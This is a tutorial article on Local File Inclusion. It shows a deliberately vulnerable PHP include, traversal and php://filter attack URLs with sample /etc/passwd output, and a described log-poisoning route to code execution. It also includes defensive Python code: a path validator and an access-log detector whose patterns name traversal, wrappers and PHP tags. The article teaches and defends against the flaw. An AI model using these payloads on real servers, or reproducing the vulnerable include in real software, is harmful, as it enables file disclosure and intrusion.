Local File Inclusion (LFI)


In this article we will go through

  • Definition
  • Severity
  • Impact
  • How it works
  • Exploitation
  • Escalations

Local file inclusion vulnerability (LFI)

Local file inclusion, commonly known as LFI, is a code flaw that allows an attacker to include internal files from the server's file system, which leads to sensitive data disclosure and may lead to remote code execution (RCE).

Severity

High

Impact

  1. Sensitive information disclosure
  2. Code execution
  3. Denial of Service

How it works

If the application performs "dynamic file inclusion" based on user input without proper validation, an attacker can include files the developer never intended to expose.

Vulnerable code

<?php
// Get the file name from user input, without any validation
$file = $_GET['file'];

// Include the file: "../" sequences and stream wrappers in $file are passed through unchanged
include('public_files/' . $file);
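The fix for the pattern above is to never let the user-supplied name reach the include as-is. The following added example (not code from the original article) shows the checks in Python so that it can be run stand-alone; the same rules carry over to PHP. It rejects NUL bytes, stream wrappers and URL schemes, absolute paths, and anything whose resolved real path leaves the public directory. The directory and file it serves are constructed in a temporary folder for the demo.

```python
"""Added example (not from the original article): a hardened replacement for the
include('public_files/'.$file) pattern. Directory and sample file are constructed."""
import os
import re
import tempfile

# Directory the application is allowed to serve from (constructed for the demo).
PUBLIC_DIR = tempfile.mkdtemp(prefix="public_files_")
with open(os.path.join(PUBLIC_DIR, "about.html"), "w") as fh:
    fh.write("<h1>About</h1>")

# Anything that looks like a scheme prefix: php://, http://, data:, file:, ...
_SCHEME = re.compile(r"^[a-zA-Z][a-zA-Z0-9+.-]*:")


def resolve_public_file(user_input: str, base_dir: str = PUBLIC_DIR) -> str:
    """Return an absolute path inside base_dir, or raise ValueError.

    Checks, in order:
    1. NUL bytes (historically used to truncate the path in C-backed APIs)
    2. stream wrappers / URL schemes (php://filter is a local wrapper and is
       not blocked by allow_url_include, so it must be rejected explicitly)
    3. absolute paths
    4. realpath containment: the target must still be under base_dir after
       symlinks and ../ sequences have been resolved
    5. the target must exist and be a regular file
    """
    if "\x00" in user_input:
        raise ValueError("NUL byte in filename")
    if _SCHEME.match(user_input):
        raise ValueError("stream wrappers / URL schemes are not allowed")
    if os.path.isabs(user_input):
        raise ValueError("absolute paths are not allowed")
    base = os.path.realpath(base_dir)
    target = os.path.realpath(os.path.join(base, user_input))
    # Compare on path components, so that /var/www/public_files2 is not
    # mistaken for a child of /var/www/public_files.
    if os.path.commonpath([base, target]) != base:
        raise ValueError("path escapes the public directory")
    if not os.path.isfile(target):
        raise ValueError("no such public file")
    return target


def is_allowed(user_input: str) -> bool:
    """True if resolve_public_file accepts the input, False otherwise."""
    try:
        resolve_public_file(user_input)
        return True
    except ValueError:
        return False


if __name__ == "__main__":
    for candidate in ["about.html", "./about.html",
                      "../../../../../etc/passwd",
                      "php://filter/convert.base64-encode/resource=image.jpg",
                      "/etc/passwd", "about.html\x00.jpg"]:
        verdict = "allowed" if is_allowed(candidate) else "rejected"
        print(f"{candidate!r:70} -> {verdict}")
```

Stronger still is not to take a file name at all: map a short key to a fixed file (for example `{"about": "about.html"}`) and look the key up in that table, so no path arithmetic is ever done on user input. The scheme check above is deliberately broad and will also reject a legitimate name containing a colon; an allowlist avoids that trade-off.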

Attack Vector

We will pass the following value to our vulnerable parameter to read the passwd file:

../../../../../etc/passwd

So let's visit the following URL:

https://website/?file=../../../../../etc/passwd

Output

root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/bin/sh
bin:x:2:2:bin:/bin:/bin/sh
sys:x:3:3:sys:/dev:/bin/sh
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/bin/sh
man:x:6:12:man:/var/cache/man:/bin/sh
messagebus:x:105:106::/var/run/dbus:/bin/false
mysql:x:106:107:MySQL Server,,,:/var/lib/mysql:/bin/false
ssh-rsa:x:1004:1004::/home/ssh-rsa:/bin/bash
...

OK, now that we have successfully included an internal system file, let's take it further.

Binary files extraction

We won't face issues extracting text files, but for non-text files (e.g. PNG, JPG, RAR, ZIP) we won't be able to extract the file successfully because the server will serve a stream of non-printable characters. Here's the workaround for this issue, using the PHP filter feature:

http://website/index.php?file=php://filter/convert.base64-encode/resource=image.jpg

The previous URL will return the file's contents encoded in base64.

Output

A large base64 string, which we can decode to get the extracted file:

...

Escalating to Remote code execution (RCE)

To gain RCE on the server we have several techniques, such as:

  1. Non-PHP file upload
  2. Apache and SSH log code injection

1. Non-PHP file upload

Simply put, if the application allows uploading files (e.g. images, videos, documents) into a directory whose location the attacker knows (e.g. /images), the attacker can embed PHP code within the file's bytes and then include the uploaded file through the vulnerable parameter to execute the injected code.

2. Apache and SSH log code injection

Since we are able to include most files on the server, let's write our malicious code into one of them so that we can execute it later.

Backdoor injection payload

In this step we have to inject our malicious code into the log files; we can do this easily with a simple GET request sent through netcat.

Please note that we used netcat rather than a web browser because we need to send our code exactly as it is, without it being URL-encoded.

As a proof of concept, let's run the command ls on the server.

Including logs

Let's go to the vulnerable page to include the server logs.

For nginx, logs are by default located at: /var/log/nginx/access.log

For Apache, logs are by default located at: /var/log/apache2/access.log

NOTE THAT:
the server log location may vary depending on the server and distribution.

By visiting our URL we will get the output of the ls command.
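Everything in this article leaves traces in the same access log that the attacker poisons: traversal sequences in the file parameter, the php://filter wrapper, a request that names the log file itself as the include target, and a PHP open tag written into the request line or User-Agent. The following added example (not code from the original article) runs those checks over constructed Apache combined-format log lines; the log format, the IPs and the requests are assumptions made for the demo, and the decoding step handles the percent-encoded form of the traversal, which a browser produces and the raw netcat request does not.

```python
"""Added example (not from the original article): detection of the LFI indicators
described above, run over constructed Apache combined-format access log lines."""
import re
from typing import Dict, Iterable, List, Optional
from urllib.parse import unquote

# Combined log format: ip ident user [time] "request" status size "referer" "user-agent"
_LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] "(?P<request>[^"]*)" '
    r'(?P<status>\d{3}) (?P<size>\S+) "(?P<referer>[^"]*)" "(?P<ua>[^"]*)"$'
)

# Each indicator is matched against the percent-decoded request line and User-Agent.
INDICATORS = {
    "traversal": re.compile(r"(\.\./|\.\.\\)"),                      # ../ or ..\ after decoding
    "php_wrapper": re.compile(r"php://", re.IGNORECASE),             # php://filter, php://input, ...
    "log_include": re.compile(r"/var/log/(apache2|nginx|httpd)/"),   # log file used as include target
    "php_tag_in_req": re.compile(r"<\?php", re.IGNORECASE),          # PHP code being written into the log
}


def _decode(value: str) -> str:
    """Decode percent-encoding twice so that double-encoded traversal is also caught."""
    return unquote(unquote(value))


def analyse_line(line: str) -> Optional[Dict[str, object]]:
    """Parse one log line and attach the list of triggered indicators; None if unparsable."""
    m = _LOG_RE.match(line)
    if not m:
        return None
    fields: Dict[str, object] = m.groupdict()
    haystack = _decode(str(fields["request"])) + "\n" + _decode(str(fields["ua"]))
    fields["indicators"] = [name for name, rx in INDICATORS.items() if rx.search(haystack)]
    return fields


def flag_lfi(lines: Iterable[str]) -> List[Dict[str, object]]:
    """Return only the entries that triggered at least one indicator."""
    hits = []
    for line in lines:
        entry = analyse_line(line)
        if entry and entry["indicators"]:
            hits.append(entry)
    return hits


# Constructed sample log lines (not real traffic).
SAMPLE_LOG = [
    '10.0.0.5 - - [01/Jan/2024:10:00:00 +0000] "GET /?file=about.html HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
    '10.0.0.9 - - [01/Jan/2024:10:00:01 +0000] "GET /?file=../../../../../etc/passwd HTTP/1.1" 200 1800 "-" "curl/8.0"',
    '10.0.0.9 - - [01/Jan/2024:10:00:02 +0000] "GET /?file=..%2F..%2F..%2Fetc%2Fpasswd HTTP/1.1" 200 1800 "-" "curl/8.0"',
    '10.0.0.9 - - [01/Jan/2024:10:00:03 +0000] "GET /index.php?file=php://filter/convert.base64-encode/resource=image.jpg HTTP/1.1" 200 9000 "-" "curl/8.0"',
    '10.0.0.9 - - [01/Jan/2024:10:00:04 +0000] "GET / HTTP/1.1" 200 512 "-" "<?php echo \'poison-test\'; ?>"',
    '10.0.0.9 - - [01/Jan/2024:10:00:05 +0000] "GET /?file=../../../../../var/log/apache2/access.log HTTP/1.1" 200 40000 "-" "curl/8.0"',
]

if __name__ == "__main__":
    for hit in flag_lfi(SAMPLE_LOG):
        print(f'{hit["ip"]} {hit["indicators"]} {hit["request"]}')
```

The "php_tag_in_req" indicator is the one that matters most for the log poisoning technique: a PHP open tag has no business in a request line or User-Agent, so alerting on it (and on a later request that includes the log path) catches the two halves of the attack. Decoding twice widens coverage at the cost of some false positives on legitimately encoded data, so treat a single "traversal" hit as a lead rather than a verdict.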